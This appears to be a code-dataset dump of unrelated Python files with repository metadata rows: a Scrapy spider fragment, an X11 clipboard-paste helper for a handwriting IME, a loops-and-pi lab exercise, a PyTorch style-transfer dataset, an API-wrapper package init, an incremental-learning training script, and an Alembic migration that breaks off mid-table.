terms = BranchSettlementItem.Meta.fields
loader = ItemLoader(item=BranchSettlementItem())
loader.default_input_processor = MapCompose(str, str.strip)
loader.default_output_processor = TakeFirst()
loader.add_value('date', self.date)
loader.add_value('code', symbol)
for idx, field in enumerate(terms):
loader.add_value(field, raw[idx])
return loader.load_item()
def on_error(self, failure):
symbol = failure.request.meta['symbol']
req = Handler.new_request(symbol, self.parse, self.on_error)
yield scrapy.Request(**req)
@classmethod
def from_crawler(cls, crawler, *args, **kwargs):
spider = super().from_crawler(crawler, *args, **kwargs)
crawler.signals.connect(spider.spider_closed, signal=scrapy.signals.spider_closed)
return spider
def spider_closed(self, spider):
least = set(self.total) - set(self.processed)
self.logger.info(f"Write {len(least)} symbol cache")
Handler.write_symbols(least)
| 42.636364 | 115 | 0.646322 | 457 | 3,752 | 5.172867 | 0.28884 | 0.050761 | 0.027919 | 0.035533 | 0.240271 | 0.22758 | 0.181472 | 0.167936 | 0.135787 | 0.101946 | 0 | 0.002781 | 0.233209 | 3,752 | 87 | 116 | 43.126437 | 0.818909 | 0 | 0 | 0.150685 | 0 | 0.013699 | 0.0629 | 0.023454 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136986 | false | 0 | 0.082192 | 0 | 0.30137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8597d6a58d9a1c42b4658050b83da78b2549954 | 2,057 | py | Python | gnome-helper.py | Saren-Arterius/google-chinese-handwriting-ime | f24d0fc1d9b7ab08aab8afa545247d560eefe293 | [
"CC0-1.0"
] | 75 | 2018-01-21T22:57:34.000Z | 2021-11-12T05:53:57.000Z | gnome-helper.py | Saren-Arterius/google-chinese-handwriting-ime | f24d0fc1d9b7ab08aab8afa545247d560eefe293 | [
"CC0-1.0"
] | 8 | 2018-01-23T11:42:25.000Z | 2022-03-25T18:47:59.000Z | gnome-helper.py | Saren-Arterius/google-chinese-handwriting-ime | f24d0fc1d9b7ab08aab8afa545247d560eefe293 | [
"CC0-1.0"
] | 9 | 2018-01-22T07:36:33.000Z | 2021-05-07T12:59:37.000Z | #!/usr/bin/env python3
from time import sleep
from sys import argv
import pyperclip
import ctypes
X11 = ctypes.CDLL("libX11.so")
CLIPBOARD_WAIT_DELAY = 0.2
class Display(ctypes.Structure):
""" opaque struct """
class XKeyEvent(ctypes.Structure):
_fields_ = [
('type', ctypes.c_int),
('serial', ctypes.c_ulong),
('send_event', ctypes.c_int),
('display', ctypes.POINTER(Display)),
('window', ctypes.c_ulong),
('root', ctypes.c_ulong),
('subwindow', ctypes.c_ulong),
('time', ctypes.c_ulong),
('x', ctypes.c_int),
('y', ctypes.c_int),
('x_root', ctypes.c_int),
('y_root', ctypes.c_int),
('state', ctypes.c_uint),
('keycode', ctypes.c_uint),
('same_screen', ctypes.c_int),
]
class XEvent(ctypes.Union):
_fields_ = [
('type', ctypes.c_int),
('xkey', XKeyEvent),
('pad', ctypes.c_long * 24),
]
X11.XOpenDisplay.restype = ctypes.POINTER(Display)
def linux_send_key(code, mask):
display = X11.XOpenDisplay(None)
winFocus = ctypes.c_ulong()
retval = ctypes.c_ulong()
X11.XGetInputFocus(display, ctypes.byref(
winFocus), ctypes.byref(retval))
k = XEvent(type=2).xkey
k.state = mask
    k.keycode = X11.XKeysymToKeycode(display, code)
k.root = X11.XDefaultRootWindow(display)
k.window = winFocus
X11.XSendEvent(display, k.window, True, 1, ctypes.byref(k))
X11.XCloseDisplay(display)
def linux_backspace():
linux_send_key(0xff08, 0)
def linux_paste():
    linux_send_key(0x0076, 4)  # Ctrl+V
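# Keysym and modifier values used above (from X11's keysymdef.h and X.h):
# 0xff08 is XK_BackSpace, 0x0076 is XK_v, and mask 4 is ControlMask,
# so linux_paste() synthesizes a Ctrl+V key press.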
def type_char(char):
    was = None
    try:
        was = pyperclip.paste()
    except Exception:  # clipboard may be empty or otherwise unavailable
        pass
pyperclip.copy(char)
# call(["xdotool", "key", "CTRL+V"], False)
linux_paste()
if was is not None:
sleep(CLIPBOARD_WAIT_DELAY)
pyperclip.copy(was)
if __name__ == '__main__':
while True:
data = input()
if data == 'bs!!':
linux_backspace()
else:
type_char(data) | 25.7125 | 63 | 0.600875 | 254 | 2,057 | 4.669291 | 0.38189 | 0.106239 | 0.067454 | 0.028668 | 0.033727 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0.251337 | 2,057 | 80 | 64 | 25.7125 | 0.747403 | 0.042781 | 0 | 0.059701 | 0 | 0 | 0.060714 | 0 | 0 | 0 | 0.006122 | 0 | 0 | 1 | 0.059701 | false | 0.014925 | 0.059701 | 0 | 0.19403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a859d985eea327c0dbbd79bbb9765350b4d53fbb | 1,594 | py | Python | lab4/lab4_loops_and_pi.py | macarl08/esc180_coursework | 16f2adda1f35875b91020e72cb4180d2e45690ce | [
"MIT"
] | null | null | null | lab4/lab4_loops_and_pi.py | macarl08/esc180_coursework | 16f2adda1f35875b91020e72cb4180d2e45690ce | [
"MIT"
] | null | null | null | lab4/lab4_loops_and_pi.py | macarl08/esc180_coursework | 16f2adda1f35875b91020e72cb4180d2e45690ce | [
"MIT"
] | null | null | null | # ESC180 Lab 4
# loops_and_pi.py
# Oct 5, 2021
# Done in collaboration by:
# Ma, Carl Ka To (macarl1) and
# Xu, Shen Xiao Zhu (xushenxi)
import math
# Problem 1
def count_evens(L):
s = 0
for num in L:
if num % 2 == 0:
s += 1
return s
# Problem 2
def list_to_str(lis):
s = "["
for num in lis:
s += str(num) + ", "
s = s.rstrip(", ")
s += "]"
return s
def lists_are_the_same(list1, list2):
if len(list1) == len(list2):
for i in range(len(list1)):
if list1[i] == list2[i]:
continue
else:
return False
else:
return False
return True
steps1 = [0]
def simplify_fraction(n, m):
    big = max(n, m)
    for i in range(big, 0, -1):
        n1 = n / i
        m1 = m / i
        steps1[0] += 1
        if n1 == int(n1) and m1 == int(m1):
            return str(int(n1)) + "/" + str(int(m1))
    return str(n) + "/" + str(m)
def count_terms(n):
    total = 0  # renamed from 'sum' to avoid shadowing the built-in
    i = 0
    while True:
        total += (-1)**i / (2*i + 1)
        i += 1
        pi = 4 * total
        if int(pi * (10**(n-1))) == int(math.pi * (10**(n-1))):
            print(pi)
            return i
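# count_terms sums the Leibniz series pi/4 = sum_{i>=0} (-1)**i / (2*i + 1),
# which converges very slowly: on the order of 10**n terms are needed for
# n correct digits.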
steps2 = [0]
def euclid(n, m):
if n==0:
return m
steps2[0] += 1
return euclid(m % n, n)
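# euclid computes gcd(n, m) recursively; steps2 counts its recursive calls,
# which grow roughly like O(log(min(n, m))), versus the O(max(n, m)) trial
# loop of simplify_fraction counted by steps1 (the two counters are printed
# together at the bottom for comparison).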
a = [1,2,3,4,5]
b = [1,2,3,4,5]
c = [2,3,4,5,1]
print("Problem 1")
print(count_evens(a))
print()
print("Problem 2")
print(list_to_str(a))
print()
print("Problem 3")
print(lists_are_the_same(a,b))
print(lists_are_the_same(a,c))
print()
print("Problem 4")
print(simplify_fraction(1, 2))
print(simplify_fraction(16, 12))
print()
print("Problem 5")
print(count_terms(5))
print()
print("Problem 6")
steps1 = [0]
steps2 = [0]
print(simplify_fraction(2322, 654))
print(euclid(2322,654))
print(steps1[0], steps2[0]) | 15.326923 | 53 | 0.59724 | 299 | 1,594 | 3.107023 | 0.274247 | 0.077503 | 0.091496 | 0.048439 | 0.055974 | 0.04521 | 0 | 0 | 0 | 0 | 0 | 0.084585 | 0.206399 | 1,594 | 104 | 54 | 15.326923 | 0.649802 | 0.090339 | 0 | 0.197368 | 0 | 0 | 0.042996 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.013158 | 0 | 0.223684 | 0.289474 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85a9316f8024e1e5d4bd7e60047a91413b93401 | 2,875 | py | Python | lib/dataset.py | Limbicnation/ada-conv-pytorch | 434e77d8987dd8bb9d4ba9612178688e2117e2cf | [
"MIT"
] | 43 | 2021-11-01T03:59:58.000Z | 2022-03-28T19:03:00.000Z | lib/dataset.py | Limbicnation/ada-conv-pytorch | 434e77d8987dd8bb9d4ba9612178688e2117e2cf | [
"MIT"
] | 3 | 2021-11-04T03:24:34.000Z | 2022-02-04T09:25:59.000Z | lib/dataset.py | Limbicnation/ada-conv-pytorch | 434e77d8987dd8bb9d4ba9612178688e2117e2cf | [
"MIT"
] | 5 | 2021-12-14T08:31:08.000Z | 2022-03-13T03:01:12.000Z | import random
import warnings
from pathlib import Path
from PIL import Image
from torch.utils.data import IterableDataset, Dataset
from torchvision.transforms import ToTensor, Compose, Resize, CenterCrop
from torchvision.utils import save_image
def files_in(dir):
return list(sorted(Path(dir).glob('*')))
def save(img_tensor, file):
if img_tensor.ndim == 4:
assert len(img_tensor) == 1
save_image(img_tensor, str(file))
def load(file):
img = Image.open(str(file))
img = img.convert('RGB')
return img
def style_transforms(size=256):
# Style images must be 256x256 for AdaConv
return Compose([
Resize(size=size), # Resize to keep aspect ratio
CenterCrop(size=(size, size)), # Center crop to square
ToTensor()])
def content_transforms(min_size=None):
# min_size is optional as content images have no size restrictions
transforms = []
if min_size:
transforms.append(Resize(size=min_size))
transforms.append(ToTensor())
return Compose(transforms)
class StylizationDataset(Dataset):
def __init__(self, content_files, style_files, content_transform=None, style_transform=None):
self.content_files = content_files
self.style_files = style_files
        identity = lambda x: x  # avoid shadowing the built-in id()
        self.content_transform = identity if content_transform is None else content_transform
        self.style_transform = identity if style_transform is None else style_transform
def __getitem__(self, idx):
content_file, style_file = self.files_at_index(idx)
content_img = load(content_file)
style_img = load(style_file)
content_img = self.content_transform(content_img)
style_img = self.style_transform(style_img)
return {
'content': content_img,
'style': style_img,
}
def __len__(self):
return len(self.content_files) * len(self.style_files)
def files_at_index(self, idx):
content_idx = idx % len(self.content_files)
style_idx = idx // len(self.content_files)
assert 0 <= content_idx < len(self.content_files)
assert 0 <= style_idx < len(self.style_files)
return self.content_files[content_idx], self.style_files[style_idx]
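    # Index layout example: with 3 content files and 2 style files the
    # dataset has length 6; idx == 4 maps to content_idx == 4 % 3 == 1 and
    # style_idx == 4 // 3 == 1, so every (content, style) pair is
    # enumerated exactly once.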
class EndlessDataset(IterableDataset):
"""
Wrapper for StylizationDataset which loops infinitely.
Usefull when training based on iterations instead of epochs
"""
def __init__(self, *args, **kwargs):
self.dataset = StylizationDataset(*args, **kwargs)
def __iter__(self):
while True:
idx = random.randrange(len(self.dataset))
try:
yield self.dataset[idx]
except Exception as e:
files = self.dataset.files_at_index(idx)
warnings.warn(f'\n{str(e)}\n\tFiles: [{str(files[0])}, {str(files[1])}]')
| 29.336735 | 97 | 0.66887 | 368 | 2,875 | 5.005435 | 0.30163 | 0.053746 | 0.060803 | 0.04126 | 0.046688 | 0.046688 | 0.031488 | 0 | 0 | 0 | 0 | 0.006824 | 0.235478 | 2,875 | 97 | 98 | 29.639175 | 0.83121 | 0.094261 | 0 | 0 | 0 | 0.015625 | 0.027509 | 0 | 0 | 0 | 0 | 0 | 0.046875 | 1 | 0.171875 | false | 0 | 0.109375 | 0.046875 | 0.421875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85aabbf97ddbf8fe98bb57622389b4ce5f6c670 | 285 | py | Python | pypxl/__init__.py | Kile/pypxl | 0aabe5492386bffc1e246100cb55448bbac521ec | [
"MIT"
] | 1 | 2021-04-02T09:05:33.000Z | 2021-04-02T09:05:33.000Z | pypxl/__init__.py | Kile/pypxl | 0aabe5492386bffc1e246100cb55448bbac521ec | [
"MIT"
] | null | null | null | pypxl/__init__.py | Kile/pypxl | 0aabe5492386bffc1e246100cb55448bbac521ec | [
"MIT"
] | null | null | null | """
pypxl - an asynchronous wrapper for pxlapi (pxlapi.dev)
:copyright: (c) 2021 Kile
:license: MIT, see LICENSE for more details
"""
__title__ = "pypxl"
__author__ = "Kile"
__license__ = "MIT"
__copyright__ = "Copyright 2021 Kile"
__version__ = "0.2.3"
from .client import PxlClient | 20.357143 | 54 | 0.722807 | 37 | 285 | 5.027027 | 0.702703 | 0.086022 | 0.150538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045643 | 0.154386 | 285 | 14 | 55 | 20.357143 | 0.726141 | 0.438596 | 0 | 0 | 0 | 0 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85bb1f21a2eedc8117779c68d0a353233875e12 | 17,848 | py | Python | multiple_auto_decay.py | aliayub7/EEC | ffb65e6701f5316b69c1ef3c3c130f00b73a18da | [
"MIT"
] | 6 | 2021-05-25T03:21:07.000Z | 2021-11-18T13:38:10.000Z | multiple_auto_decay.py | aliayub7/EEC | ffb65e6701f5316b69c1ef3c3c130f00b73a18da | [
"MIT"
] | null | null | null | multiple_auto_decay.py | aliayub7/EEC | ffb65e6701f5316b69c1ef3c3c130f00b73a18da | [
"MIT"
] | 1 | 2021-05-25T12:07:49.000Z | 2021-05-25T12:07:49.000Z | import numpy as np
import sys
import os
import time
import pickle
from PIL import Image
from copy import deepcopy
import random
from sklearn.model_selection import train_test_split
import json
#from multiprocessing import Pool as cpu_pool
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
from models.resnet import resnet18
from models.resnet import resnet34
import torch.nn.functional as F
from get_incremental_data import getIncrementalData
from get_transformed_data_with_decay import getTransformedData
from get_previous_data import getPreviousData
#from get_transformed_data import getTransformedData
from my_models.new_shallow import auto_shallow
from training_functions import train_reconstruction
from training_functions import eval_reconstruction
from training_functions import get_embeddings
from training_functions import get_pseudoimages
from training_functions import train
from training_functions import eval_training
from training_functions import train_with_decay
from training_functions import eval_training_with_decay
from get_centroids import getCentroids
from Functions_new import get_pseudoSamples
from label_smoothing import LSR
#seed = random.randint(0,1000)
seed = 7
np.random.seed(seed)
torch.manual_seed(seed)
random.seed(seed)
if __name__ == '__main__':
dataset_name = 'imagenet'
features_name = 'multiple_65000'
save_data = False
use_saved_images = True
path_to_previous = '/home/ali/Ali_Work/clean_autoencoder_based/Imagenet-50/previous_classes'
validation_based = False
if dataset_name == 'imagenet':
path_to_train = '/media/ali/860 Evo/ali/ILSVRC2012_Train'
path_to_test = '/media/ali/860 Evo/ali/ILSVRC2012_Test'
# incremental steps info
total_classes = 10
full_classes = 1000
limiter = 50
# Image transformation mean and std
imagenet_mean = [0.485, 0.456, 0.406]
imagenet_std = [0.229, 0.224, 0.225]
# hyperparameters
weight_decay = 5e-4
classify_lr = 0.1
reconstruction_lr = 0.001
reconstruction_epochs = 100
classification_epochs = 70
batch_size = 64
sample_decay_coeff = 0.05
decay_type = 'exponential'
# for centroids
distance_threshold = 5000
get_covariances = True
diag_covariances = True
clustering_type = 'k_means'
centroids_limit = 10000
centroid_finder = getCentroids(None,None,total_classes,seed=seed,get_covariances=get_covariances,diag_covariances=diag_covariances,centroids_limit=centroids_limit)
# autoencoders_set
auto_1 = auto_shallow(total_classes,seed=seed)
auto_2 = auto_shallow(total_classes,seed=seed)
auto_3 = auto_shallow(total_classes,seed=seed)
auto_4 = auto_shallow(total_classes,seed=seed)
auto_5 = auto_shallow(total_classes,seed=seed)
auto_1 = auto_1.cuda()
auto_2 = auto_2.cuda()
auto_3 = auto_3.cuda()
auto_4 = auto_4.cuda()
auto_5 = auto_5.cuda()
autoencoder_set = [auto_1,auto_2,auto_3,auto_4,auto_5]
#classifier
classify_net = resnet18(total_classes)
#classify_net = resnet18(limiter)
# loss functions and optimizers
#loss_classify = nn.CrossEntropyLoss()
loss_classify = LSR(reduction='none')
loss_rec = nn.MSELoss()
# Variable to generate incremental data
incremental_data_creator = getIncrementalData(path_to_train,path_to_test,full_classes=full_classes,seed=seed)
incremental_data_creator.incremental_data(total_classes=total_classes,limiter=limiter)
# define transforms
transforms_classification_train = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize(32),
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(15),
transforms.ToTensor(),
transforms.Normalize(imagenet_mean,imagenet_std)
])
transforms_classification_test = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize(32),
transforms.CenterCrop(32),
transforms.ToTensor(),
transforms.Normalize(imagenet_mean,imagenet_std)
])
transforms_reconstruction = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize(32),
transforms.CenterCrop(32),
transforms.ToTensor(),
transforms.Normalize(imagenet_mean,imagenet_std)
])
################################# INCREMENTAL LEARNING PHASE ##################################
complete_x_train = []
complete_y_train = []
complete_x_test = []
complete_y_test = []
complete_centroids = []
complete_covariances = []
complete_centroids_num = []
ages = []
training_accuracies = []
Accus = []
full_classes = limiter
for increment in range(0,int(full_classes/total_classes)):
print ('This is increment number: ',increment)
# get data for the current increment
train_images_increment,train_labels_increment,test_images_increment,test_labels_increment = incremental_data_creator.incremental_data_per_increment(increment)
if increment==0:
previous_images = deepcopy(train_images_increment)
previous_labels = deepcopy(train_labels_increment)
current_increment_ages = [1.0 for x in range(len(train_labels_increment))]
else:
previous_images = []
previous_labels = []
most_recent_images = []
most_recent_labels = []
if use_saved_images:
starter = len(complete_centroids)-total_classes
else:
starter = 0+(increment-1)*total_classes
for i in range(starter,len(complete_centroids)):
temp = complete_centroids[i] # feature vectors for class i
previous_labels.extend([i for x in range(0,len(complete_centroids[i]))]) # labels for class i
if i>=(len(complete_centroids)-total_classes):
most_recent_labels.extend([i for x in range(0,len(complete_centroids[i]))])
# converting to Torch format
temp = np.array(temp)
temp = torch.from_numpy(temp)
temp = temp.float()
# convert feature vectors to images by passing them through the decoder
temp_images,_ = get_pseudoimages(autoencoder_set[increment-1],temp,class_number=i,seed=seed)
temp_images = list(temp_images)
if i>=(len(complete_centroids)-total_classes):
most_recent_images.extend(temp_images)
# update the overall images variable for the previous classes
if use_saved_images == False:
previous_images.extend(temp_images)
if use_saved_images:
# For loading previous class' reconstructed images
previous_data_creator = getPreviousData(path_to_previous,total_classes=total_classes+(increment-1)*total_classes,seed=seed)
previous_images,previous_labels = previous_data_creator.previous_data()
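            # At this point previous_images holds decoder reconstructions
            # ("pseudo-images") of the stored class centroids, which stand in
            # for the real training images of earlier increments during
            # rehearsal.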
# Finding sample decay
previous_dataset = getTransformedData(most_recent_images,most_recent_labels,transform=transforms_classification_train,seed=seed)
previous_loader = torch.utils.data.DataLoader(previous_dataset,batch_size = batch_size,
shuffle=True, num_workers = 4)
new_accuracy = eval_training_with_decay(classify_net,previous_loader,loss_classify,seed)
new_accuracy = new_accuracy.cpu().numpy().tolist()
sample_decay_coeff = 1 - (new_accuracy/training_accuracies[increment-1])
#new_ages = [np.exp(-sample_decay_coeff*1.0) for x in range(0,len(most_recent_images))]
new_ages = [np.exp(-sample_decay_coeff*0.0) for x in range(0,len(most_recent_images))] # for no decay
ages.extend(new_ages)
current_increment_ages = deepcopy(ages)
current_increment_ages.extend([1.0 for x in range(len(train_labels_increment))])
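            # Illustrative decay numbers (hypothetical): if the previous
            # increment trained to 0.95 accuracy but re-evaluates at 0.76 now,
            # sample_decay_coeff = 1 - 0.76/0.95 = 0.2 and each replayed sample
            # would get weight exp(-0.2) ~= 0.82; with the exponent forced to
            # 0.0 above, the weight stays 1.0 (decay disabled).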
print ('previous images',np.array(previous_images).shape)
print ('previous labels',np.array(previous_labels).shape)
# append images of the new classes
previous_images.extend(train_images_increment)
previous_labels.extend(train_labels_increment)
print ('total train images',np.array(previous_images).shape)
print ('total train labels',np.array(previous_labels).shape)
# complete x test update with new classes' test images
complete_x_test.extend(test_images_increment)
complete_y_test.extend(test_labels_increment)
if validation_based:
# Creating a validation split
x_train,x_test,y_train,y_test = train_test_split(previous_images,previous_labels,test_size=0.2,stratify=previous_labels)
else:
# otherwise just rename variables
x_train = previous_images
y_train = previous_labels
#x_test = complete_x_test
#y_test = complete_y_test
############################## Classifier Training ######################################
# get dataloaders
train_dataset_classification = getTransformedData(x_train,y_train,transform=transforms_classification_train,seed=seed,ages=current_increment_ages)
test_dataset_classification = getTransformedData(complete_x_test,complete_y_test,transform=transforms_classification_test,seed=seed)
dataloaders_train_classification = torch.utils.data.DataLoader(train_dataset_classification,batch_size = batch_size,
shuffle=True, num_workers = 4)
dataloaders_test_classification = torch.utils.data.DataLoader(test_dataset_classification,batch_size = batch_size,
shuffle=False, num_workers = 4)
if validation_based:
val_dataset_classification = getTransformedData(x_test,y_test,transform=transforms_classification_test,seed=seed)
dataloaders_val_classification = torch.utils.data.DataLoader(val_dataset_classification,batch_size = batch_size,
shuffle=False, num_workers = 4)
# update classifier's fc layer and optimizer
classify_net.fc = nn.Linear(512,total_classes+(total_classes*increment))
optimizer = optim.SGD(classify_net.parameters(),lr=classify_lr,weight_decay=weight_decay,momentum=0.9)
train_scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[60,120,160], gamma=0.2) #learning rate decay
classify_net = classify_net.cuda()
# for faster training times after the first increment
if increment>0:
classification_epochs = 45
train_scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[37], gamma=0.1) #learning rate decay
# load the classifier from file if it has already been trained on the classes of this increment
classifier_path = './checkpoint/'+str(total_classes+(increment*total_classes))+"classes_"+dataset_name
if os.path.exists(classifier_path):
classify_net.load_state_dict(torch.load(classifier_path))
epoch_acc = eval_training_with_decay(classify_net,dataloaders_test_classification,loss_classify,seed=seed)
Accus.append(epoch_acc.cpu().numpy().tolist())
else:
since = time.time()
best_acc = 0.0
for epoch in range(0, classification_epochs):
classification_loss = train_with_decay(classify_net,dataloaders_train_classification,optimizer,loss_classify,seed=seed)
print ('epoch:', epoch, ' classification loss:', classification_loss, ' learning rate:', optimizer.param_groups[0]['lr'])
train_scheduler.step(epoch)
if validation_based:
epoch_acc = eval_training_with_decay(classify_net,dataloaders_val_classification,loss_classify,seed=seed)
if epoch_acc>=best_acc:
best_acc = epoch_acc
best_model_wts = deepcopy(classify_net.state_dict())
print (' ')
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
if validation_based:
#print ('best_acc',best_acc)
classify_net.load_state_dict(best_model_wts)
epoch_acc = eval_training_with_decay(classify_net,dataloaders_test_classification,loss_classify,seed=seed)
print ('test_acc',epoch_acc)
Accus.append(epoch_acc.cpu().numpy().tolist())
if validation_based:
torch.save(best_model_wts, "./checkpoint/"+str(total_classes+(increment*total_classes))+"classes_"+dataset_name)
else:
torch.save(classify_net.state_dict(),"./checkpoint/"+str(total_classes+(increment*total_classes))+"classes_"+dataset_name)
# find training accuracy of images of this increment
current_dataset = getTransformedData(train_images_increment,train_labels_increment,transform=transforms_classification_train,seed=seed)
current_loader = torch.utils.data.DataLoader(current_dataset,batch_size = batch_size,
shuffle=True, num_workers = 4)
print('Finding Training Accuracy')
new_accuracy = eval_training_with_decay(classify_net,current_loader,loss_classify,seed)
new_accuracy = new_accuracy.cpu().numpy().tolist()
training_accuracies.append(new_accuracy)
############################## Autoencoder Training ######################################
# get dataloaders
train_dataset_reconstruction = getTransformedData(train_images_increment,train_labels_increment,
transform=transforms_reconstruction,seed=seed)
test_dataset_reconstruction = getTransformedData(test_images_increment,test_labels_increment,transform=transforms_reconstruction,seed=seed)
dataloaders_train_reconstruction = torch.utils.data.DataLoader(train_dataset_reconstruction,batch_size = batch_size,
shuffle=True, num_workers = 4)
dataloaders_test_reconstruction = torch.utils.data.DataLoader(test_dataset_reconstruction,batch_size = batch_size,
shuffle=True, num_workers = 4)
for_embeddings_dataloader = torch.utils.data.DataLoader(train_dataset_reconstruction,batch_size = batch_size,
shuffle=False, num_workers = 4)
# load the autoencoder from file if it has already been trained on the classes of this increment
autoencoder_path = './checkpoint/autoencoder_'+str(total_classes+(increment*total_classes))+"classes_"+dataset_name
if os.path.exists(autoencoder_path):
autoencoder_set[increment].load_state_dict(torch.load(autoencoder_path))
else:
optimizer_rec = optim.Adam(autoencoder_set[increment].parameters(), lr=reconstruction_lr, weight_decay=weight_decay)
train_scheduler_rec = optim.lr_scheduler.MultiStepLR(optimizer_rec, milestones=[50], gamma=0.1) #learning rate decay
since = time.time()
best_loss = 100.0
for epoch in range(1, reconstruction_epochs):
#reconstruction_loss = train_reconstruction(autoencoder_set[increment],dataloaders_train_reconstruction,
#optimizer_rec,loss_rec,lambda_based=True,classify_net=classify_net,seed=seed,epoch=epoch)
reconstruction_loss = train_reconstruction(autoencoder_set[increment],dataloaders_train_reconstruction,optimizer_rec,loss_rec,seed=seed,epoch=epoch)
print ('epoch:', epoch, ' reconstruction loss:', reconstruction_loss)
train_scheduler_rec.step(epoch)
"""
#test_loss = eval_reconstruction(net,dataloaders_test_reconstruction,loss_rec,seed=seed)
test_loss = eval_reconstruction(autoencoder_set[increment],dataloaders_test_reconstruction,loss_rec,seed=seed)
if test_loss<=best_loss:
best_loss = test_loss
#best_model_wts = deepcopy(net.state_dict())
best_model_wts = deepcopy(autoencoder_set[increment].state_dict())
"""
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print (' ')
#autoencoder_set[increment].load_state_dict(best_model_wts)
if validation_based:
torch.save(best_model_wts, "./checkpoint/autoencoder_"+str(total_classes+(increment*total_classes))+"classes_"+dataset_name)
else:
torch.save(autoencoder_set[increment].state_dict(),
"./checkpoint/autoencoder_"+str(total_classes+(increment*total_classes))+"classes_"+dataset_name)
# get embeddings from the trained autoencoder
embeddings = get_embeddings(autoencoder_set[increment],for_embeddings_dataloader,total_classes,seed=seed,increment=increment)
print ('embeddings',np.array(embeddings).shape)
complete_centroids.extend(embeddings)
print ('complete centroids',np.array(complete_centroids).shape)
print ('All accuracies yet', Accus)
experimental_data = dict()
experimental_data['seed'] = seed
experimental_data['acc'] = Accus
if save_data:
# load existing results if present; json.load would otherwise raise
# FileNotFoundError on the first run
data = dict()
if os.path.exists('data.json'):
with open('data.json','r') as f:
data=json.load(f)
if features_name not in data:
data[features_name] = dict()
data[features_name][str(len(data[features_name])+1)] = experimental_data
with open('data.json', 'w') as fp:
json.dump(data, fp, indent=4, sort_keys=True)
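# Resulting data.json layout (illustrative):
# { "<features_name>": { "1": {"seed": ..., "acc": [...]},
#                        "2": {"seed": ..., "acc": [...]} } }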
| 48.89863 | 167 | 0.69173 | 2,089 | 17,848 | 5.607946 | 0.147918 | 0.033803 | 0.019633 | 0.018438 | 0.472898 | 0.38216 | 0.316432 | 0.268801 | 0.245668 | 0.195391 | 0 | 0.014851 | 0.215262 | 17,848 | 364 | 168 | 49.032967 | 0.821576 | 0.101468 | 0 | 0.207407 | 0 | 0 | 0.046735 | 0.012615 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.122222 | 0 | 0.122222 | 0.059259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85bd223e0cf28db4979086843c4d74e26ddf230 | 1,038 | py | Python | server/migrations/versions/cef206444493_finished_stockdata_model.py | J-Obog/market-simulator | 90446f42a5f86f13785ea5010687a5e2c1fb2799 | [
"MIT"
] | 4 | 2021-08-09T03:05:08.000Z | 2021-11-08T02:41:13.000Z | server/migrations/versions/cef206444493_finished_stockdata_model.py | J-Obog/market-simulator | 90446f42a5f86f13785ea5010687a5e2c1fb2799 | [
"MIT"
] | null | null | null | server/migrations/versions/cef206444493_finished_stockdata_model.py | J-Obog/market-simulator | 90446f42a5f86f13785ea5010687a5e2c1fb2799 | [
"MIT"
] | null | null | null | """finished StockData model
Revision ID: cef206444493
Revises: b2fc3cd134da
Create Date: 2021-10-06 14:23:02.119153
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'cef206444493'
down_revision = 'b2fc3cd134da'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('stock_data',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('stock_id', sa.Integer(), nullable=False),
sa.Column('prev_close', sa.Float(decimal_return_scale=2), nullable=False),
